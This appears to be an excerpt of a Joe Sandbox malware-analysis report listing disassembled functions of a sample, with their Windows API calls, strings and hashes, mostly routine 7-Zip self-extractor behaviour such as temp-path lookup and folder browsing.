Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B

??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245

Strings

IA, xrefs: 0040C0EC
IA, xrefs: 0040C11B
IA, xrefs: 0040C12D

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: IA$IA$IA
API String ID: 4294387087-924693538
Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54

Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898

Strings

IA, xrefs: 0040E818, 0040E841

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID: IA
API String ID: 3462485524-3293647318
Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401029
wsprintfW.USER32 ref: 00401049
lstrcatW.KERNEL32(?,?), ref: 0040105C
ExitProcess.KERNEL32 ref: 00401084

Strings

0x%p, xrefs: 00401043

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA

Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9

GetSystemMetrics.USER32(00000007), ref: 00407A51
GetSystemMetrics.USER32(00000007), ref: 00407A62
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29

Strings

100%% , xrefs: 00407A81, 00407A88, 00407AE1

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99

Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407A12

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

GetDlgItem.USER32(?,000004B3), ref: 004079C6

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4

Strings

(%u%s), xrefs: 00407A0C

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: TextWindow$ItemLength$??3@wsprintf
String ID: (%u%s)
API String ID: 3595513934-2496177969
Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68

Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
GetProcAddress.KERNEL32(00000000), ref: 00402211

Strings

kernel32, xrefs: 00402205
GetNativeSystemInfo, xrefs: 00402200

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32
API String ID: 2574300362-3846845290
Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE

Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
GetProcAddress.KERNEL32(00000000), ref: 0040219F

Strings

kernel32, xrefs: 00402193
Wow64RevertWow64FsRedirection, xrefs: 0040218E

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C

Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
GetProcAddress.KERNEL32(00000000), ref: 004021D1

Strings

kernel32, xrefs: 004021C5
Wow64DisableWow64FsRedirection, xrefs: 004021C0

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC

Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658

Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
wsprintfW.USER32 ref: 00403FFB
GetFileAttributesW.KERNEL32(?), ref: 00404016

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88

Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: CharUpper
String ID:
API String ID: 9403516-0
Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64

Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
GetDlgItem.USER32(?,000004B7), ref: 00408020
SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
String ID:
API String ID: 2538916108-0
Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54

Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
GetSystemMetrics.USER32(00000031), ref: 0040683A
CreateFontIndirectW.GDI32(?), ref: 00406849
DeleteObject.GDI32(00000000), ref: 00406878

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54

Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040749F
SHBrowseForFolderW.SHELL32(?), ref: 004074B8
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
SHGetMalloc.SHELL32(00000000), ref: 004074FE

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID:
API String ID: 1557639607-0
Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75

Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID:
API String ID: 612612615-0
